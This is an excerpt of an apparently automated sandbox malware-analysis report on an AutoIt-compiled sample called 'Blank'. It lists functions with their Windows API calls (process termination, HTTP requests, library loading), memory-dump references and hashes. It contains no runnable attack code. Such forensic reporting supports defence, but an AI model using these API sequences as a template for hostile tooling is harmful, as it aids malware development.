                                                                                                                                    • Instruction Fuzzy Hash: 400148B09017597DE3008F5A8C85A52FEA8FF59354F00411BA15847942C7B5A864CBE5
                                                                                                                                    Function 002C59A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002C59B4
                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002C59CA
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 002C59D9
                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002C59E8
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002C59F2
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002C59F9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                    • Opcode ID: 70c96737b279b8582a8a015e9ddeeac36ee576e10e9f406e1d4db2bb74b606dc
                                                                                                                                    • Instruction ID: f13fdbf32bcbba1e5647fe69a7abd7fb9499e7d04f2b783825c256465be5cde2
                                                                                                                                    • Opcode Fuzzy Hash: 70c96737b279b8582a8a015e9ddeeac36ee576e10e9f406e1d4db2bb74b606dc
                                                                                                                                    • Instruction Fuzzy Hash: E1F06D32240159BBE3215B92AC4DEFF7A3CEBC6B61F000169FA05D1051DBA02A11C6B5
                                                                                                                                    Function 002C77EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 002C77FE
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,0026C2B6,?,?), ref: 002C780F
                                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,0026C2B6,?,?), ref: 002C781C
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0026C2B6,?,?), ref: 002C7829
                                                                                                                                      • Part of subcall function 002C71F0: CloseHandle.KERNEL32(00000000,?,002C7836,?,0026C2B6,?,?), ref: 002C71FA
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 002C783C
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,0026C2B6,?,?), ref: 002C7843
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                    • Opcode ID: 24c63ebc1dae767aa0336d0f985d030da79802c46f3e6ac284df855a9b9374ab
                                                                                                                                    • Instruction ID: 041518797cef8bed53591abab6311a3ac798ef09bc072d39fad335b794c43420
                                                                                                                                    • Opcode Fuzzy Hash: 24c63ebc1dae767aa0336d0f985d030da79802c46f3e6ac284df855a9b9374ab
                                                                                                                                    • Instruction Fuzzy Hash: 2DF05E32145212ABD7112BA4FCCCEBB7729FF45362B540535F602A50A2CBB55811DF60
                                                                                                                                    Function 002B954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002B9555
                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 002B9561
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002B956A
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002B9572
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 002B957B
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 002B9582
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                    • Opcode ID: bd2a9724ce78bfb679a728e2776aed25a9af9eafee51ee3ca43c928a139090f0
                                                                                                                                    • Instruction ID: f175cf10e7e5b7478328b9e0edcda2da6c689d7d91aeff9d233084ad83d0960e
                                                                                                                                    • Opcode Fuzzy Hash: bd2a9724ce78bfb679a728e2776aed25a9af9eafee51ee3ca43c928a139090f0
                                                                                                                                    • Instruction Fuzzy Hash: F3E0C236004106BBDA012BE2FC4C96ABF29FB497B2B504230F21981171CB32A460DB50
                                                                                                                                    Function 002D8CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #8.OLEAUT32(?,002F0980), ref: 002D8CFD
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002D8E0C
                                                                                                                                    • #9.WSOCK32(?,00000001,00000000,Incorrect Parameter format,00000000), ref: 002D8F84
                                                                                                                                      • Part of subcall function 002C7B1D: #8.OLEAUT32(00000000,?,?,?,?,?,002D9DBE,?,?), ref: 002C7B5D
                                                                                                                                      • Part of subcall function 002C7B1D: #10.WSOCK32(00000000,?,?,002D9DBE,?,?), ref: 002C7B66
                                                                                                                                      • Part of subcall function 002C7B1D: #9.WSOCK32(00000000,?,002D9DBE,?,?), ref: 002C7B72
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                    • API String ID: 3964851224-1221869570
                                                                                                                                    • Opcode ID: 7cf0eb0d73df6495c5c3851c60eeb51924f20886d794a4141e0da972dbf02ca4
                                                                                                                                    • Instruction ID: 728e3208fe95bbd6aaa6869c2af9f967d2f271455b4ec2a62f16cf2d71cb895d
                                                                                                                                    • Opcode Fuzzy Hash: 7cf0eb0d73df6495c5c3851c60eeb51924f20886d794a4141e0da972dbf02ca4
                                                                                                                                    • Instruction Fuzzy Hash: AD916A716283019FC710EF24C48095ABBE5EF99754F14896EF88A8B3A2DB30ED55CF52
                                                                                                                                    Function 002C323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0027436A: _wcscpy.LIBCMT ref: 0027438D
                                                                                                                                    • _memset.LIBCMT ref: 002C332E
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002C335D
                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002C3410
                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002C343E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 4152858687-4108050209
                                                                                                                                    • Opcode ID: 3ad6931e35b1bd7a84f470d7a1050c609d6ff925cb16dbc94d03ec8a99f697e8
                                                                                                                                    • Instruction ID: 48625d7816db526418bf333927b34e3719237bd619e13b492d67dd4c542af6e9
                                                                                                                                    • Opcode Fuzzy Hash: 3ad6931e35b1bd7a84f470d7a1050c609d6ff925cb16dbc94d03ec8a99f697e8
                                                                                                                                    • Instruction Fuzzy Hash: A051B1316283429AD726EE289845F6B77E8AF45720F048A2DF895D31D1DB70CE64CB92
                                                                                                                                    Function 002C9B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00274A8C: _fseek.LIBCMT ref: 00274AA4
                                                                                                                                      • Part of subcall function 002C9CF1: _wcscmp.LIBCMT ref: 002C9DE1
                                                                                                                                      • Part of subcall function 002C9CF1: _wcscmp.LIBCMT ref: 002C9DF4
                                                                                                                                    • _free.LIBCMT ref: 002C9C5F
                                                                                                                                    • _free.LIBCMT ref: 002C9C66
                                                                                                                                    • _free.LIBCMT ref: 002C9CD1
                                                                                                                                      • Part of subcall function 00282F85: HeapFree.KERNEL32(00000000,00000000,?,00289C54,00000000,00288D5D,002859C3), ref: 00282F99
                                                                                                                                      • Part of subcall function 00282F85: GetLastError.KERNEL32(00000000,?,00289C54,00000000,00288D5D,002859C3), ref: 00282FAB
                                                                                                                                    • _free.LIBCMT ref: 002C9CD9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                    • API String ID: 1552873950-2806939583
                                                                                                                                    • Opcode ID: 9f268ee33bcb1f75aa3aeeee7154aa456b846d35517db1a4f1f5b18c02f52451
                                                                                                                                    • Instruction ID: 4688ebda3722b18d0a5086e4bb50ce44dac3e8f286fb9edabd65169b31d02f61
                                                                                                                                    • Opcode Fuzzy Hash: 9f268ee33bcb1f75aa3aeeee7154aa456b846d35517db1a4f1f5b18c02f52451
                                                                                                                                    • Instruction Fuzzy Hash: FB517CB1914219AFDF24EF64DC85A9EBBB9FF48300F10419EF209A3281DB715A90CF58
                                                                                                                                    Function 002EDF09 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,002D8A0E,?,00000000), ref: 002EDF71
                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,002D8A0E,?,00000000,00000000), ref: 002EDFA7
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 002EDFB8
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,002D8A0E,?,00000000,00000000), ref: 002EE03A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                                    • Opcode ID: c9aeb466cb570cd9406397d812c9c0dad710e115905148b7e892bfe02fd94e1a
                                                                                                                                    • Instruction ID: a26d817af18dd1756991646235a8d18af358ec14ef9e9e7057c58ed9220cc747
                                                                                                                                    • Opcode Fuzzy Hash: c9aeb466cb570cd9406397d812c9c0dad710e115905148b7e892bfe02fd94e1a
                                                                                                                                    • Instruction Fuzzy Hash: 3D41D171650205EFDF14CF56D884AAABBA9EF44350F9580AAEC09AF206D7F1DD50CBA0
                                                                                                                                    Function 002C2EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002C2F67
                                                                                                                                    • GetMenuItemInfoW.USER32(00000004,?,00000000,?), ref: 002C2F83
                                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 002C2FC9
                                                                                                                                    • DeleteMenu.USER32(?,?,00000000,?,00000000,00000000,00327890,?), ref: 002C3012
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1173514356-4108050209
                                                                                                                                    • Opcode ID: 943985074048d2c30123b7138a4d144226a359ffedd371f5bdd1659192186d95
                                                                                                                                    • Instruction ID: a72cabbc4f8fb690af5c664dbb283364b1f8505a7d950c0aff7cbda1399b49e7
                                                                                                                                    • Opcode Fuzzy Hash: 943985074048d2c30123b7138a4d144226a359ffedd371f5bdd1659192186d95
                                                                                                                                    • Instruction Fuzzy Hash: 6F418231218342DFD720DF24C885F5ABBE8AF84324F148B2DF56597291DB70E915CB52
                                                                                                                                    Function 002DDE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002DDEAE
                                                                                                                                      • Part of subcall function 00271462: _memmove.LIBCMT ref: 002714B0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharLower_memmove
                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                    • API String ID: 3425801089-567219261
                                                                                                                                    • Opcode ID: 8a68cd881d1fc6c3e82262cbd2146f970c6fe7f429faa22adf8a5cb3b7baab5c
                                                                                                                                    • Instruction ID: a311f258dbff5b0e6a32622572b55c55deb6b949d17f232ccd811a5e817c6eda
                                                                                                                                    • Opcode Fuzzy Hash: 8a68cd881d1fc6c3e82262cbd2146f970c6fe7f429faa22adf8a5cb3b7baab5c
                                                                                                                                    • Instruction Fuzzy Hash: 12316074620616AFCB14EF98C9419EEB3B4FF19310B10862AE866977D1DB71AD25CB80
                                                                                                                                    Function 002B9A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                      • Part of subcall function 002BB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002BB7BD
                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002B9ACC
                                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002B9ADF
                                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 002B9B0F
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 365058703-1403004172
                                                                                                                                    • Opcode ID: a04a7ec10963d243d2188e2eb1ec00b226713dfd614f550550de96917f1cf2fd
                                                                                                                                    • Instruction ID: 654fc6abd8afdc6010e47caf5f80a7786dd203be818e69858325909675a52ec4
                                                                                                                                    • Opcode Fuzzy Hash: a04a7ec10963d243d2188e2eb1ec00b226713dfd614f550550de96917f1cf2fd
                                                                                                                                    • Instruction Fuzzy Hash: 2C2104719211047EDB14EBA4DC85CFEB7ACDF453A0F108119F925972D1DB340965DA20
                                                                                                                                    Function 002D1EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002D1F18
                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002D1F3E
                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002D1F6E
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 002D1FB5
                                                                                                                                      • Part of subcall function 002D2B4F: GetLastError.KERNEL32(?,?,002D1EE3,00000000,00000000,00000001), ref: 002D2B64
                                                                                                                                      • Part of subcall function 002D2B4F: SetEvent.KERNEL32(?,?,002D1EE3,00000000,00000000,00000001), ref: 002D2B79
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                                    • Opcode ID: 4c66078882b12732b4233a9da16f575e72b767ad8c608193e21f7a396023abbd
                                                                                                                                    • Instruction ID: 26970575e571c4242da318d36952ea6796f3c1e7809448b850ecd08b91e5e043
                                                                                                                                    • Opcode Fuzzy Hash: 4c66078882b12732b4233a9da16f575e72b767ad8c608193e21f7a396023abbd
                                                                                                                                    • Instruction Fuzzy Hash: 5B21D0B1524308BEE711AF209CC5EBFB6ADEB48794F10002BF40592740DB649D259BA0
                                                                                                                                    Function 002E6A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00262111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0026214F
                                                                                                                                      • Part of subcall function 00262111: GetStockObject.GDI32(00000011), ref: 00262163
                                                                                                                                      • Part of subcall function 00262111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0026216D
                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002E6A86
                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 002E6A8D
                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002E6AA2
                                                                                                                                    • DestroyWindow.USER32(?), ref: 002E6AAA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                    • String ID: SysAnimate32
